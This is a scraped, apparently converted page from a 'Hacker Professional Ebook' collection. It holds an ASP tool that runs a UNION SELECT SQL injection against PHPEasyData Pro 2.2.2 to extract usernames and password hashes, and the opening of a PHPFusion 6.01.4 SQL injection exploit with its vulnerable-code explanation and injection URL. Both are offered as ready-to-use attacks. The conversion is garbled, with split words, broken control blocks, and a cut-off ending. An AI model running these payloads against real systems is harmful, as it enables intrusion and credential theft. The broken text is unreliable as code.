Hacker Professional Ebook part 413 potx

Trang 1

008000">

<font face="Verdana" size="2" color="#008000"><b><a href="exploit3.asp"

>PHPEasyData Pro </b>v2.2.2 (index.php) <u><b>

Remote SQL Injection Exploit</b></u></a></font><br><br>

<table border="1" cellpadding="0" cellspacing="0"

style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808 080" bordercolordark="#008000" bordercolor="#808080">

<tr>

<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</fon t>Example:[http://x.com/path]</b></font><p>

<font face="Arial" size="1"><b>Example:[User

ID=1]</b></font></td>

<input type="text" name="text1" value="http://" size="25" style="backgroun

d-color: #808080"><br><input type="text" name="id" value="5" size="25" styl e="background-color: #808080">

</tr>

</table>

<%

islem = Request.QueryString("islem")

If islem = "hata1" Then

Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">Th ere is a problem! Please complete to the whole spaces</font>"

End If

Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">Th ere is a problem! Please right character use</font>"

Trang 2

End If

Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">Th ere is a problem! Add ""http://""</font>"

End If

%>

<%

If islem = "get" Then

string1="/index.php?cat=-1%20union%20"

string2="select%200,concat(user_login,char(32)"

string3=",user_pass),0,0,"

string4="0%20from%20an_users%"

string5="20where%20user_id%20"

string6="like%20"

string7=Request.Form("id")

string8="/*"

targettext = Request.Form("text1")

arama=InStr(1, targettext, "union" ,1)

arama2=InStr(1, targettext, "http://" ,1)

If targettext="" Then

Response.Redirect("exploit3.asp?islem=hata1")

Else

If arama>0 then

Else

If arama2=0 then

Else

%>

Trang 3

<%

target1 = targettext+string1+string2+string3+string4+string5+string6+string7 +string8

Public Function take(come)

Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )

With objtake

Open "GET" , come, FALSE

sEnd

take = Responsetext

End With

SET objtake = Nothing

End Function

get_username = take(target1)

getdata=InStr(get_username,"""box-content"">" )

username=Mid(get_username,getdata+14,60)

%>

ajann<br></b></u></font>

<table border="1" cellpadding="0" cellspacing="0"

style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808 080" bordercolordark="#008000" bordercolor="#808080">

<tr>

<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style background='#808080';" onmouseout="javascript:this.style.background='#80 8000';">         &n bsp;  

</td>

Trang 4

</tr>

</table>

</form>

</center>

write()

functionControl1()

</script>

</body>

</html>

<%

End If

Set objtake = Nothing

%>

# milw0rm.com [2006-10-29]

sexyvirus(HCE)

PHPFusion <= 6.01.4 sql injection exploit

Code:

#!/usr/bin/php -q -d short_open_tag=on

Trang 5

<?

print_r('

-

PHPFusion <= 6.01.4 extract()/_SERVER[REMOTE_ADDR] sql injection exploit

by rgod rgod@autistici.org

site: http://retrogod.altervista.org

-

');

/*

works with

register globals = *Off*

magic_quotes_gpc = Off

explaination:

vulnerable code in maincore.php at lines 15-21:

if (ini_get('register_globals') != 1) {

$supers =

array("_REQUEST","_ENV","_SERVER","_POST","_GET","_COOKIE","_SES SION","_FILES","_GLOBALS");

foreach ($supers as $ s) {

if ((isset($$ s) == true) && (is_array($$ s) == true)) extract($$ s, EXTR_OVERWRITE);

}

unset($supers);

}

extract() function can be sometimes a security hazard, in this case it allows

to overwrite some arrays like _SERVER[] one and launch an sql injection attack, ex:

http://[target]/[path]/news.php?_SERVER[REMOTE_ADDR]='[SQL]

other attacks may be possible

*/

if ($argc<3) {

Định dạng
Số trang	6
Dung lượng	18,77 KB